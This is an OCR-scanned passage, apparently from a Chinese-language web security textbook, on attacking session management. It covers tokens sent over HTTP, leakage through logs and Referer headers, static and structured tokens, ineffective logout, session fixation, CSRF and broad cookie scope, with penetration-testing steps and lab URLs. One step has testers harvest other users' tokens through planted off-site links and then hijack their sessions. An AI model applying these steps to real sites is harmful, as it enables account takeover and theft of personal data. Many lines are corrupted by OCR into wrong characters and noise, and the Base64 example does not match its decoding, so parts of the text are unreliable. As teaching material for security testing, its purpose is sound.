的 一 串 数 字 ， 或 者 用 户 PIN 号 码 中 的 几 个 特殊 数字 ) ， 这 时 攻击 者 如 
果 想 执行 任意 操作 ， 就 必须 劫持 他 窃听 的 会 话 。 或 者 如 果 登 录 机 制 实 
施 严 格 的 审查 ， 并 且 在 每 次 成 功 登 录 后 通知 用 户 ， 那 么 攻击 者 可 能 希 
望 避免 自己 登录 ， 以 尽 可 能 保持 活动 的 隐秘 性 。 

在 其 他 情况 下 ， 使 用 HTTPS 保 护 关 键 客 户 端 -服务 器 通信 的 应 用 程 
序 的 会 话 令 牌 仍然 可 能 在 网 络 上 遭 到 拦截 。 这 种 薄弱 环节 表现 形式 各 
ee ee een ery 
和 险 机 制 时 。 

口 一些 应 用 程序 在 登录 阶段 选择 使 用 HTTPS 保 护 用 户 证 书 的 安 
全 ， 但 在 用 户 会 话 的 其 他 阶段 转 而 使 用 HTTP。 许 多 Web 邮 件 应 用 程序 
以 这 种 方式 运作 。 在 这 种 情况 下 ， 窃 听 者 无 法 拦截 用 户 的 证 书 ， 但 仍 
然 可 以 截获 会 话 令 牌 。Firefox 的 插件 Firesheep 工 具 会 让 这 一 过 程 变 得 
轻而易举 。 

口 一 些 应 用 程序 在 站 点 中 预先 通过 验证 的 区 域 (如 站 点 首页 ) 使 
用 HTTP， 但 从 登录 页 面 开 始 转换 到 HTTPS。 然 而 ， 许 多 时 候 ， 应 用 
程序 在 用 户 访问 第 一 个 页 面 时 就 给 他 发 布 一 个 会 话 令 牌 ， 并 且 在 用 户 
登录 时 也 不 修改 这 个 令 牌 。 最 初 并 未 通过 验证 的 用 户 会 话 在 登录 后 却 
被 升级 为 通过 验证 的 会 话 。 在 这 种 情况 下 ， 窃 听 者 就 可 以 在 登录 前 拦 
截 用 户 的 令 牌 ， 等 待 用 户 转换 到 HTTPS 进 行 通 信 (表示 用 户 正 在 登 
录 ) 然后 尝试 使 用 那个 令 牌 访问 一 个 受 保护 的 页 面 (如 “我 的 账 


口 即使 应 用 程序 在 用 户 成 功 登 录 后 发 布 一 个 新 令 牌 ， 并 从 登录 页 
面 开 始 使 用 HTTPS， 但 是 ， 如 采用 户 通过 单 击 验证 区 域 中 的 一 个 链 
接 、 使 用 “后 退 ” 按 钮 或 者 直接 输入 URL， 重 新 访问 一 个 预先 验证 的 页 
面 (如 “帮助 "或 “天 于 ”页 面 ) ， 用 户 通 过 验证 的 会 话 令 牌 仍 有 可 能 
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口 与 前 面 的 情况 稍 有 不 同 ， 应 用 程序 可 能 在 用 户 单 击 登录 链接 后 
转换 到 HTTPS。 然 而 ， 如 果 用 户 对 URL 进 行 相应 修改 ， 应 用 程序 仍然 
接受 通过 HTTP 进 行 登录 。 这 时 ， 处 在 适当 位 置 的 攻击 者 就 可 以 修改 站 
点 预先 通过 验证 的 区 域 返回 的 页 面 ， 使 登录 链接 指向 一 个 HTTP 页 面 。 
即使 应 用 程序 在 用 户 成 功 登录 后 发 布 一 个 新 令 牌 ， 如 果 攻 击 者 已 成 功 
将 用 户 的 链接 降级 为 HITP， 他 仍然 能 够 拦截 这 个 令 牌 。 

口 一 些 应 用 程序 对 应 用 程序 内 的 全 部 静态 内 容 (如 图 像 、 脚 本 、 
样式 表 和 页 面 模板 ) 使 用 HTTP。 如 果 出 现 这 种 行为 ， 用户 的 浏览 器 将 
显示 一 条 警告 消息 ， 如 图 7-9 所 示 。 当 浏览 器 显示 此 警告 时 ， 它 已 经 通 
过 HTTP 获 取 了 相关 数据 项 ， 因 而 已 经 传送 了 会 话 令 牌 。 浏 览 器 显示 警 
告 是 为 了 让 用 户 拒 绝 处 理 已 通过 HTTP 接 收 到 并 因此 可 能 受到 污染 的 响 
应 数据 。 如 前 所 述 ， 如 果 用 户 的 浏览 器 通过 HTTP 访 问 一 个 资源 ， 并 使 
用 这 个 令 牌 通过 HTTPS 访 问 站 点 中 受 保 护 的 非 静 态 区 域 ， 攻 击 者 就 能 
拦截 该 用 户 的 会 话 令 牌 。 


Security Warning 


qQ Do you want to view only the webpage content that was delivered 
securely? 


DI 


This webpage contains content that will not be delivered using a secure HTTPS 
connection, which could compromise the security of the entire webpage 


rm Pr 


图 7-9 如果 一 个 通过 HTTPS 访 问 的 页 面包 含 通过 HTTP 访 问 的 数据 ， 浏 览 器 将 显示 
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口 即 使 应 用 程序 在 每 一 个 页 面 (包括 站 点 中 末 通 过 验证 的 区 域 和 
静态 内 容 ) 都 使 用 HTITPS， 有 些 情况 下 ， 用 户 的 令 牌 仍然 通过 HTTP 
传送 。 如 果 攻 击 者 能 够 以 某 种 方式 诱 使 用 户 通 过 HTTP 提 出 一 个 请 求 
(或 者 是 请 求 相同 服务 器 上 运行 的 HTTP 服 务 ， 或 者 是 访问 
http://server:443/) ， 那 么 用 户 就 可 能 在 这 个 过 程 中 提交 令 牌 。 这 时 ， 
攻击 者 可 以 采用 的 攻击 手段 包括 在 一 封 电子 邮件 或 即时 消 妃 中 给 用 户 
发 送 一 个 URL， 在 他 控制 的 一 个 Web 站 点 中 插入 一 个 自动 加 载 的 链 
接 ， 或 者 使 用 可 单 击 的 横幅 广告 。 《请 参阅 第 12 章 和 第 13 章 了 解 使 用 
这 种 技巧 对 其 他 用 户 实 施 攻 击 的 详细 内 容 。) 


渗透 测试 步骤 


(1) 以 正常 方式 访问 应 用 程序 ， 从 第 一 个 进入 点 (“起 
”URL) 开始 ， 接 着 是 登录 过 程 ， 然 后 是 应 用 程序 的 全 部 功能 。 
记录 每 一 个 被 访问 的 URL 以 及 收 到 新 会 话 令 牌 的 每 种 场合 。 特 别 注 
意 登 录 功 能 及 HTTP 与 HTITPS 通 信之 间 的 转换 。 可 以 使 用 网 络 嗅 探 
as (如 Wireshark) 手动 或 使 用 拦截 代理 服务 器 中 的 日 志 功 能 部 分 自 
动 完 成 这 一 任务 ， 如 图 7-10 所 示 。 


17-10 ”遍历 应 用 程序 ， 确 认 收 到 新 会 话 令 牌 的 位 置 


(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 那 么 应 确 
认 其 是 否 设 置 了 secure 标 记 ， 防 止 它们 通过 非 加 密 连 接 传 送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下 ， 确 定 会 话 令 牌 是 否 通过 
非 加 密 连 接 传 送 。 如 果 确 实 如 此 ， 应 将 其 视 为 易于 受到 拦截 。 

(4) 如 果 起 始 页 面 使 用 HTTP， 然 后 在 登录 和 站 点 中 通过 验证 
的 区 域 转换 到 HTTPS， 确 认 应 用 程序 是 否 在 用 户 登 录 后 发 布 一 个 新 
令 牌 ， 或 者 在 使 用 HTTP 阶 段 传送 的 令 牌 是 否 仍 被 用 于 追踪 用 户 通 
过 验证 的 会 话 。 同 时 确认 ， 如 果 对 登录 URL 进 行 相 应 修改 ， 应 用 程 
序 是 否 接受 通过 HTTP 登 录 。 

(5) 即使 应 用 程序 在 每 一 个 页 面 使 用 HTTPS， 确 认 服 务 器 是 
否 还 监听 80 端 口 ， 通 过 它 运行 任何 服务 或 内 容 。 如 果 是 这 样 ， 直 接 
使 用 通过 验证 的 会 话 访问 所 有 HTTP URL， 确 认 会 话 令 牌 是 否 被 伟 


送 
(6) 如 果 通 过 HTTP 将 通过 验证 会 话 的 令 牌 传送 给 服务 器 ， 确 
认 该 令 牌 是 否 继续 有 效 ， 或 者 立即 被 服务 器 终止 。 


尝试 访问 


http://mdsec.net/auth/369/ 
http://mdsec.net/auth/372/ 
http://mdsec.net/auth/374/ 


7.3.2 ”在 日 志 中 泄露 令 


除 在 网 络 通信 中 明文 传送 会 话 令 牌 外 ， 各 种 系统 日 志 也 常常 将 令 
牌 泄 露 给 未 授权 方 。 虽 然 这 种 情况 很 少 发 生 ， 但 由 于 除了 处 在 网 络 适 
当 位 置 的 匀 听 者 之 外 ， 还 有 其 他 各 种 潜在 的 攻击 者 都 能 查阅 这 些 日 
志 ， 这 种 泄露 通常 会 造成 更 严重 的 后 果 。 

许多 应 用 程序 为 管理 员 和 其 他 支持 人 员 提 供 监 挖 和 控制 应 用 程序 
运行 时 状态 (包括 用 户 会 话 ) 的 功能 。 例 如 ， 帮 助 用 户 解 决 疑 难 的 服 
务 台 工作 人 员 可 能 会 要 求 用 户 提 供用 户 名 、 通 过 列表 或 搜索 功能 定位 
他 们 当前 的 会 话 ， 并 查看 与 会 话 有 关 的 细 市 。 或 者 管理 员 可 能 会 在 调 
查 一 起 违反 安全 事件 的 过 程 中 查询 最 近 会 话 的 日 志 记 录 。 通 常 ， 这 种 
监控 和 控制 功能 会 泄露 每 个 会 话 的 令 牌 。 而 且 ， 这 种 功能 一 般 没 有 得 
到 良好 的 保护 ， 人 允许 未 授权 用 户 访问 当前 会 话 令 牌 列表 ， 因 而 支持 所 
有 应 用 程序 用 户 的 会 话 。 

会 话 令 牌 出 现在 系统 日 志 中 的 另 一 个 主要 原因 是 应 用 程序 使 用 
URL 查 询 字符 串 ， 而 不 是 使 用 HTTP cookie 或 POST 请 求 主体 作为 令 牌 
传输 机 制 。 例 如 ， 在 Google 上 查询 inurl: jsessionid 即 可 确定 数 千 个 在 
以 下 URL 中 传送 Java 平 台 会 话 令 牌 〈 称 作 jsessionid) 的 应 用 程序 : 

http://www. webjunction.org/do/Navigation;jsessionid= 

F27ED2A6AAE4C6DA409A3044E79B8B48?category=327 

如 果 应 用 程序 以 这 种 方式 传送 会 话 令 牌 ， 它 们 的 会 话 令 牌 就 可 能 
出 现在 各 种 未 授权 用 户 能 够 访问 的 系统 日 志 中 ， 例 如 : 

口 用 户 浏览 絮 的 日 志 ; 

口 Web 服 务 硕 日 志 ; 

口 企业 或 ISP 代 理 服务 器 日 志 ; 

口 任 何在 应 用 程序 主机 环境 中 采用 的 反 向 代理 的 日 志 ; 


口 应 用 程序 用 户 通过 单 击 站 外 链接 访问 的 任何 服务 器 的 Referer 日 
， 如 图 7-11 所 示 ° 
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图 7-11 ” 当 会 话 令 牌 出 现在 URL 中 时 ， 只 要 用 户 点 击 站 外 链接 或 浏览 器 加 载 站 外 资 
源 ， 会 话 令 牌 就 会 在 Referer 消 息 头 中 传送 


即使 整个 应 用 程序 都 使 用 HTTPS， 这 些 漏洞 仍 有 可 能 出 现 。 

上 面 描述 的 最 后 一 种 情况 为 攻击 者 提供 了 一 种 截获 应 用 程序 会 话 
令 牌 的 非常 有 效 的 方法 。 例 如 ， 如 果 一 个 Web 邮 件 应 用 程序 在 URL 中 
传送 会 话 令 牌 那么 攻击 者 就 可 以 同 应 用 程序 的 用 户 发 送 一 封 电 子 邮 
件 ， 在 里 面包 含 一 个 连接 到 他 控制 的 Web 服 务 器 的 链接 。 > WAE fA H 
户 访问 这 个 链接 (如 单 击 它 ， 或 者 他 们 的 浏览 器 加 载 了 包含 在 HTML 
格式 的 电子 邮件 中 的 图 像 ) ， 攻 击 者 就 会 实时 收 到 该 用 户 的 会 话 令 
牌 。 然 后 ， 攻 击 者 只 需 在 他 的 服务 器 上 运行 一 段 脚本 ， 就 可 以 劫持 每 
mens 并 执行 某 种 恶意 操作 ， 如 发 送 垃圾 邮件 、 获 取 个 人 
言 息 或 修改 密码 。 


TZ 注解 追 附 通过 HTTPS 访 问 的 页 面 中 包含 的 站 外 链接 时 


=i 前 版 本 的 Internet Explorer 中 并 不 包含 Referer 消 息 头 。 在 这 种 情况 

下 ， 只 要 站 外 链接 也 通过 HTTPS 访 问 ， 即 使 它 属于 另 一 个 域 ， 
Firefox 中 也 包含 Referer 消 息 头 。 因 此 ， 即 使 使 用 SSL， 揪 入 在 URL 
中 的 敏感 数据 也 容易 在 Referer 日 志 中 泄露 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 的 所 有 功能 ， 找 出 可 查看 会 话 令 牌 的 任何 
日 志 或 监控 功能 。 查 明 谁 能 够 访问 这 种 功能 ， 例 如 管理 员 、 任 何 通 
过 验证 的 用 户 或 匿名 用 户 。 请 参阅 第 4 草 了 解 发 现在 主 应 用 程序 中 
没有 建立 直接 链接 的 隐藏 内 容 的 技巧 。 

(2) 确定 应 用 程序 使 用 URL 中 传送 会 话 令 牌 的 任何 情况 。 可 
能 应 用 程序 通常 以 更 加 安全 的 方式 传送 令 牌 ， 但 开发 者 在 特定 情况 
下 使 用 URL 来 解决 特殊 难题 。 例 如 ，Web 应 用 程序 与 外 部 系统 交互 
时 通常 会 出 现 这 种 情况 。 

(3) 如 果 应 用 程序 在 URL 中 传送 会 话 令 牌 ， 尝 试 发 现任 何 允 
许 在 其 他 用 户 查 阅 的 页 面 中 注入 任意 站 外 链接 的 应 用 程序 功能 ， 例 
如 公告 牌 、 站 点 反馈 、 问 与 答 等 功能 。 如 果 可 以 ， 回 一 个 受 探 制 的 
Web 服 务 器 提交 链接 ， 等 待 一 段 时 间 ， 看 Referer 日 志 中 是 否 收 到 任 
何 用 户 的 会 话 令 牌 。 

(4) 如果 截获 到 任何 会 话 令 牌 ， 竹 试 通过 正常 使 用 应 用 程 
序 ， 而 不 是 用 截获 的 令 牌 代替 目 己 的 令 牌 来 劫持 用 户 的 会 话 。 可 以 
通过 拦截 服务 器 返回 的 下 一 个 啊 应 ， 并 使 用 截获 的 cookie 值 添加 目 
已 的 Set-Cookie 消 息 头 ， 以 实现 这 一 目的 。 在 Burp 中 ， 可 以 应 用 一 
个 Suite 范 围 的 配置 ， 在 所 有 指 癌 目标 应 用 程序 的 请 求 中 设置 一 个 特 
殊 cookie， 以 便 测 试 期 间 在 不 同 的 会 话 之 间 轻 松 切换 。 

(5) 如果 和 截获 到 大 量 令 牌 ， 并 且 通 过 劫持 用 户 的 会 话 可 以 访 
问 他 们 的 敏感 数据 〈 如 个 人 资料 、 文 付 信息 或 用 户 密码 ) ， 就 能 够 
ee 目 动 技巧 获得 想 要 的 、 属 于 其 他 应 用 程序 用 户 的 
数据 。 


尝试 访问 


http://mdsec.net/auth/379/ 


733 SÉ 会 话 映射 易 受 攻击 


由 于 应 用 程序 在 将 生成 和 处 理 的 会 话 令 牌 与 令 牌 所 属 的 用 户 会 话 
oe ee 
见 的 漏洞 。 

最 简单 的 漏洞 是 允许 给 同一 个 用 户 账 户 同 时 分 配 几 个 有 效 的 令 
牌 。 在 几乎 每 一 个 应 用 程序 中 ， 任 何 用户 都 没有 正当 理由 在 任何 指定 
的 时 间 拥 有 多 个 会 话 。 当 然 ， 用 户 可 以 终止 一 个 处 于 活动 状态 的 会 
话 ， 再 开始 一 个 新 会 话 ， 这 很 常见 ， 例 如 ， 关 闭 浏览 絮 窗 口 或 较 换 到 
男 一 台 计 算 机 上 。 但 是 ， 如 果 一 名 用 户 明显 同时 在 使 用 两 个 不 同 的 会 
话 ， 这 通常 表示 出 现 了 安全 问题 ， 要 么 钙 因 为 用 户 将 证 书 泄露 给 了 第 
三 方 ， 要 么 是 攻击 者 通过 其 他 某 种 途径 获得 了 他 的 证 书 。 无 论 发 生 哪 
一 种 情况 ， 都 不 应 允许 并 行 会 话 ， 因 为 它 允 许 用 户 持续 执行 任何 非法 
操作 ， 同 时 允许 攻击 者 使 用 截获 的 证 书 ， 却 不 存在 被 检测 出 来 的 风 
险 。 

应 用 程序 使 用 "静态 ” 令 牌 是 一 种 相对 较为 特殊 的 缺陷。 这 些 “ 令 
牌 ” 看 似 会 话 令 牌 ， 最 初 表 现 的 功能 和 会 话 令 牌 一 样 ， 但 实际 并 非 如 
此 。 在 这 些 应 用 程序 中 ， 每 名 用 户 都 分 配 有 一 个 令 胜 ， 并 且 用 户 每 次 
登录 ， 都 收 到 相同 的 令 牌 。 无 论 用 户 是 否 已 经 登 孙 并 获得 令 牌 ， 应 用 
程序 都 应 将 该 令 牌 视 为 有 效 令 牌 。 这 种 应 用 程序 实际 上 是 对 会 话 的 整 
体 概念 以 及 这 样 做 有 助 于 管理 和 控制 应 用 程序 访问 存 有 误解 。 有 些 时 
候 ， 应 用 程序 这 样 运 作 ， 是 为 了 执行 设计 上 存在 缺陷 的 “ 记 住 我 ” 功 
能 ， 并 因此 将 静态 令 牌 保存 在 一 个 持久 性 cookie 中 〈 请 参阅 第 6 章 了 解 
相关 内 容 ) 。 有 时 ， 令 牌 本 身 易于 受到 预测 攻击 ， 致 使 这 种 漏洞 造成 
更 加 产 重 的 后 采 ， 因 为 一 次 成 功 的 攻击 不 仅 能 够 攻破 当前 登录 用 户 的 
会 话 ， 如 条 时 间 允 许 ， 还 能 攻破 所 有 注册 用 户 的 账户 。 

我 们 偶尔 也 会 观察 到 应 用 程序 表现 出 其 他 奇怪 的 行为 ， 表 明令 牌 
和 会 话 之 间 的 对 应 关系 存在 基本 的 缺陷 。 根 据 用 户 名 和 一 个 随机 成 分 


构造 的 有 意义 令 牌 就 是 一 个 典型 的 示例 。 以 下 面 的 令 脾 为 例 : 
AXNlcj1kYWY7cjE9MTMWOTQXODEYMTMONTkwMTI= 
对 其 进行 Base64 编 码 ， 得 到 : 
user=daf;r1=13094181213459012 


对 成 分 rl 进行 仔细 分 析 后 ， 我 们 可 以 得 出 结论 ， 根据 样本 值 无 法 
对 其 进行 预测 。 然 而 ， 如 采 应 用 程序 的 会 话 处 理 逻 辑 存 在 缺陷 ， 可 能 
攻击 者 只 需 癌 rL 和 user 提 交 任 何 有 效 的 值 ， 束 可 以 在 指定 用 户 的 权限 下 
访问 一 个 会 话 。 从 本 质 上 讲 ， 这 是 一 个 访问 控制 漏洞 ， 因 为 应 用 程序 
是 根据 用 户 在 会 话 之 外 提交 的 数据 做 出 的 访问 决定 〈 请 参阅 第 8 章 了 解 
相关 内 容 ) 。 产 生 这 种 漏洞 是 因为 应 用 程序 使 用 会 话 令 牌 表明 请 求 者 
已 经 与 应 用 程序 建立 某 种 有 效 的 会 话 ， 然 而 ， 处 理会 话 的 用 户 权 限 并 
不 由 会 话 控制 ， 而 是 通过 其 他 方式 根据 每 个 请 求 决定 。 在 这 种 情况 
下 ， 请 求 者 直接 控制 决定 用 户 权限 的 方式 。 


渗透 测试 步骤 


(1) 用 相同 的 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 
机 两 次 登 示 应 用 程序 。 确 定 这 两 个 会 话 是 否 都 处 于 活动 状态 。 如 采 
征 ， 表 示 应 用 程序 文 持 并 行 会 话 ， 这 样 攻破 其 他 用 户 证 书 的 攻击 着 
能 够 利用 这 些 证 书 ， 而 不 会 有 被 检测 出 来 的 风险 。 

(2) 用 相同 的 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 
机 几 次 登录 和 退出 应 用 程序 。 确 定 应 用 程序 在 每 次 登录 时 是 发 布 一 
个 新 会 话 令 脾 ， 还 是 发 布 相同 的 令 牌 。 如 果 每 次 发 布 相同 的 令 牌 ， 
那么 应 用 程序 根本 没有 正确 使 用 令 牌 。 

(3) 如 果 令 牌 明显 包含 某 种 结构 和 意义 ， 设 法 将 标识 用 户 身 
份 的 成 分 与 无 法 辨别 的 成 分 区 分 开 来 。 竹 试 修改 所 有 与 用 己 有 关 的 
令 牌 成 分 ， 使 其 指向 其 他 已 知 的 应 用 程序 用 户 ， 确 定 修 改 后 的 令 牌 
古 否 补 应 用 程序 接受 ， 以 及 是 否 能 够 让 攻击 者 伪装 成 那 名 用 户 。 


尝试 访问 


http://mdsec.net/auth/382/ 
http://mdsec.net/auth/385/ 


7.3.4 ”会 话 终 止 易 受 攻击 


由 于 两 方面 的 原因 ， 正 确 终止 会 话 非 常 重要 。 首 先 ， 尽 可 能 缩短 
一 个 会 话 的 天命 可 降低 攻击 者 截获 、 猜 测 或 滥用 有 效 会 话 令 牌 的 可 能 
性 。 其 次 ， 如 宋 用 户 不 再 需要 现 有 会 话 ， 终 止 会 话 为 用 户 提供 一 种 使 
其 失效 的 途径 ， 在 进一步 降低 上 述 可 能 性 的 同时 ， 在 茶 种 程度 上 确保 
共享 计算 环境 中 会 话 的 安全 。 会 话 终止 功能 的 主要 缺陷 大 都 与 无 法 满 
足 这 两 个 关键 目 标 有 关 。 

一 些 应 用 程序 并 不 实施 有 效 的 会 话 终 止 功 能 。 会 话 一 旦 建立 ， 它 
在 收 到 最 后 请 求 后 的 许多 天 内 也 仍然 有 效 ， 直 到 服务 器 最 终 将 其 清 
除 。 即 使 令 牌 存在 某 种 非常 难以 利用 的 缺陷 (例如 ， 确 定 每 个 有 效 令 
牌 需要 100 000 次 猜测 ) ， 攻 击 者 仍然 能 够 截获 最 近 访 问 应 用 程序 的 每 
一 名 用 户 的 令 牌 。 

一 些 应 用 程序 并 不 提供 有 效 的 退出 功能 。 

口 有 些 时 候 ， 应 用 程序 根本 不 执行 退出 功能 。 用 户 没有 办 法 要 求 
应 用 程序 终止 他 们 的 会 话 。 

口 有 些 时 候 ， 退 出 功能 实际 上 并 不 能 帮助 服务 器 终止 会 话 。 即 使 
服务 右 从 用 户 的 浏 咒 絮 中 删除 令 脾 (例如 ， 通 过 发 布 一 个 清空 令 有 牧 的 
Set-Cookie 指 令 ) 。 然 而， 如 果 用 户 继续 提交 这 个 令 牌 ， 服 务 器 仍然 接 
有 区 

OBR: 当 用 户 单 击 “ 退 出 ”按钮 时 ， 应 用 程序 并 不 与 服 
务 器 通信 ， 因 此 服务 器 不 采取 任何 行动 。 相反 ， 应 用 程序 执行 一 段 客 
己 问 脚本 清空 用 户 的 cookie， 在 随后 的 请 求 中 将 用 户 返 回 到 登录 页 
人 


渗透 测试 步骤 


(1) 不 要 掉 入 检查 应 用 程序 对 客户 端 令 脾 执行 的 操作 (如 通 
过 一 个 新 的 SetrCookie 指 令 、 客 户 端 脚本 或 者 终止 时 间 属 性 令 cookie 
失效 ) 的 陷阱 。 在 客户 端 浏 览 器 内 对 令 牌 执行 的 任何 操作 并 不 能 终 
会 话 。 相 反 ， 调 查 服务 器 端 是 否 执行 会 话 终止 操作 。 
(a) 登录 应 用 程序 获得 一 个 有 效 令 牌 。 
(b) 不 使 用 这 个 令 牌 ， 等 待 一段 时 间 后 ， 使 用 这 个 令 牌 
提交 一 个 访问 受 保 护 页 面 (如 “我 的 资料 ”页 面 ) 的 请 求 。 


(c) 如 果 该 页 面 正 党 显示， 表示 令 牌 仍然 处 于 活动 状 


(d) 使 用 反复 试验 的 方法 确定 会 话 终 止 超时 时 间 ， 或 者 
一 个 令 脾 在 最 后 一 次 使 用 它 提交 请 求 几 天 后 是 否 仍 被 使 用 。 可 
配置 Burp IntruderM 增 连续 请 求 之 则 的 时 间 间 隅 ， 自 动 完 成 这 项 
任务 。 
(2) 确定 是 否 存在 退出 功能 ， 用 户 是 否 能 够 使 用 这 一 功能 。 
如 果 不 能 ， 表 示 用 户 更 易于 受到 攻击 ， 因 为 他 们 没有 办 法 让 应 用 程 
序 终 止 会 话 。 
(3) 如 果 应 用 程序 提供 退出 功能 ， 测 试 其 效率 。 退 出 后 ， 尝 
试 重 狐 使 用 原 有 的 令 牌 ， 确 定 其 是 否 仍然 有 效 。 如 采 令 牌 仍然 有 
效 ， 那 么 即使 用 户 已 经 * 退 出”， 也 依然 易于 受到 会 话 支持 攻击 。 可 
以 使 用 Burp Suite 测 试 此 功能 的 效率 ， 具 体操 作 如 下 : 从 代理 服务 需 
历史 记录 中 选择 一 个 依赖 会 话 的 最 近 请 求 ， 在 从 应 用 程序 中 注销 后 
将 其 发 送 给 Burp Repeater 重 新 发 布 该 请 求 。 
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尝试 访问 


http://mdsec.net/auth/423/ 


http://mdsec.net/auth/439/ 
http://mdsec.net/auth/447/ 
http://mdsec.net/auth/452/ 
http://mdsec.net/auth/457/ 


7.3.5 客户 端 暴露 在 令 牌 动 持 风 险 之 中 


攻击 者 可 以 采用 各 种 方法 向 应 用 程序 的 其 他 用 户 发 动 攻击 ， 试 图 
截获 或 滥用 他 们 的 会 话 令 牌 。 

口 攻击 者 可 通过 跨 站 点 脚本 攻击 查询 用 户 的 cookie， 获 得 他 们 的 
会 话 令 牌 ， 然 后 将 其 传送 至 目 己 欣 制 的 任意 服务 器 。 第 12 章 将 详细 介 
绍 这 种 攻击 。 

口 攻 击 者 可 以 使 用 其 他 针对 用 户 的 攻击 ， 以 不 同 的 方式 支持 用 户 
的 会 话 。 这 包括 实施 会 话 固定 攻击 ， 即 攻击 者 同一 名 用 户 发 送 一 个 已 
知 的 会 话 令 牌 ， 等 待 他 登录 ， 然 后 支持 他 的 会 话 ;， 以 及 跨 站 点 请 求 伪 
造 攻击 ， 其 中 攻击 者 从 他 控制 的 一 个 Web 站 点 同 应 用 程序 提出 一 个 专 
门 设计 的 请 求 ， 由 于 用 户 的 浏 贤 器 会 随同 这 个 请 求 一 起 自动 提交 用 户 
当前 的 cookie， 攻 击 者 因此 会 获得 用 户 的 cookie。 这 些 攻 击 也 请 参阅 第 
12 章 的 介绍 。 


渗透 测试 步骤 


(1) 确定 应 用 程序 中 存在 的 任何 路 站 点 脚本 漏洞 ， 看 是 否 可 

i 
X) o 

(2) 如 果 应 用 程序 向 未 通过 验证 的 用 户 发 布 令 牌 ， 就 会 获得 
一 个 令 脾 并 进行 一 次 登录 。 如 果 应 用 程序 在 攻击 者 登录 后 并 不 发 布 
一 个 新 令 牌 ， 就 表示 它 易 于 受到 会 话 固定 攻击 。 

(3) 即使 应 用 程序 并 不 同 未 通过 验证 的 用 户 发 布 会 话 令 牌 ， 
仍然 会 通过 登录 获得 一 个 令 牌 然后 返回 登录 页 面 。 如 果 应 用 程 
序 “ 愿 意 ” 返 回 这 个 页 面 ， 即 使 攻击 者 已 经 通过 验证 ， 那 么 也 可 以 使 
用 相同 的 令 脾 以 男 一 名 用 户 的 身份 提交 男 一 次 登录 。 如 果 应 用 程序 
ne a ee ieee eae ae ave 


(4) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 格式 有 效 的 伪造 
值 修改 令 牌 ,然后 竹 试 使 用 它 登 录 。 如 果 应 用 程序 允许 使 用 一 个 捏 
造 的 令 牌 建立 一 个 通过 验证 的 会 话 ， 表 示 它 易于 受到 会 话 固定 攻 
cote 


(5) 如 果 应 用 程序 并 不 支持 登录 功能 ， 但 处 理 敏感 数据 (如 
个 人 信息 和 支付 细节 ) ， 并 在 提交 后 显示 这 些 信息 (如 在 “确认 订 
单 * 页 面 上 ) ， 那 么 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 敏感 数 
据 的 页 面 。 如 果 在 匿名 使 用 应 用 程序 期 间 生 成 的 令 牌 可 用 于 获取 用 
户 的 敏感 信息 ， 那 么 应 用 程序 就 易于 遭受 会 话 固定 攻击 。 

(6) 如 果 应 用 程序 完全 依靠 HTTP cookie 传 送 会 话 令 牌 ， 它 很 
可 能 容易 受到 跨 站 点 请 求 伪造 (CSRF) 攻击 。 首 先 登 录 应 用 程 
序 。 然 后 ， 从 另 一 个 应 用 程序 的 页 面向 应 用 程序 提出 一 个 请 求 ， 解 
认 它 是 否 会 提交 用 户 的 令 牌 。 (必须 从 与 登录 目标 应 用 程序 相同 的 
浏览 器 进程 窗口 提交 令 牌 。) 设法 确定 所 有 参数 可 由 攻击 者 提前 决 
定 的 应 用 程序 敏感 功能 ， 利 用 这 种 缺陷 在 目标 用 户 的 权限 下 执行 未 
授权 操作 。 请 参阅 第 13 章 了 解 实 施 CSRF 攻 击 的 详情 。 


7.3.6 宽泛 的 cookie 范 围 


cookie 的 工作 机 制 可 简单 概括 如 下 : 服务 器 使 用 HTTP 啊 应 消息 头 
Set-cookie fp — ^ cookie, ATM hae Hee a Ais ok F EH Cookie/# 
已 头 回 同一 台 服 务 器 重 狐 提交 这 个 cookie。 事 实 上 ， 事 情 远 比 这 复 
Fu [0] 


He 

cookie 机 制 人 允许 服务 器 指定 将 每 个 cookie 重 新 提交 到 哪个 域 和 哪个 
URL 路 径 。 为 完成 这 一 任务 ， 它 在 Set-cookie 指 令 中 使 用 domain 和 path 
属性 。 
1 .cookie 域 限制 

位 于 foo.wahh-app.com 的 应 用 程序 建立 一 个 cookie 后 ， 浏 览 絮 会 默 
认 在 随后 的 所 有 请 求 中 将 cookie 重新 提交 到 foo.wahh-app.com 及 任何 
子 域 (如 admin.foo.wahh-app.com) 中 。 它 不 会 将 cookie 提 交 给 其 他 任 
何 域 ， 包 括 父 域 wahh-app. com 和 父 域 的 其 他 任何 子 域 ， 如 bar.wahh- 
app.com ° 

服务 器 可 以 在 Set-cookie 指 令 中 插入 一 个 domain 属 性 ， 以 改变 这 种 
默认 行为 。 例 如 ， 假 设 位 于 foo.wahh-app.com 的 应 用 程序 返回 以 下 
HTTPYA SK: 


Set-cookie: sessionId=19284710; domain=wahh-app.com; 


A hha AIX cookie E tte 20 24 wahh-app.comAa Ara TE, 包括 
bar.wahh-app.com ° 


TZ 注解 服务 器 不 能 使 用 这 个 属性 随意 指定 域 。 首 先 ， 指 定 


的 域 要 么 必须 是 应 用 程序 在 其 上 运行 的 域 ， 要 么 是 它 的 父 域 (或 为 
直接 父 域 ， 或 有 一 定 间隔 ) 。 其 次 ， 指 定 的 域 不 能 为 .com 或 .co.uk 之 


类 的 顶级 域 ， 因 为 这 样 做 会 允许 恶意 服务 絮 在 其 他 任何 域 上 建立 任 
意 cookie。 如 果 服 务 器 违反 以 上 任何 一 条 规定 ， 浏 览 器 将 完全 忽略 
Set-cookie 指 令 。 


如 有 条 应 用 程序 将 cookie 范 围 设 定 得 过 于 宽 汉 ， 也 可 能 会 使 应 用 程 
序 出 现 各 种 安全 漏洞 。 

以 一 个 允许 用 户 注册 、 登 录 、 写 博客 文章 、 阅 读 他 人 博客 的 博客 
应 用 程序 为 例 。 它 的 主 应 用 程序 位 于 域 wahh-blogs.com 上 ， 当 用 户 登 
录 这 个 应 用 程序 时 ， 他 会 从 一 个 以 这 个 域 为 范围 的 cookie 中 收 到 会 话 


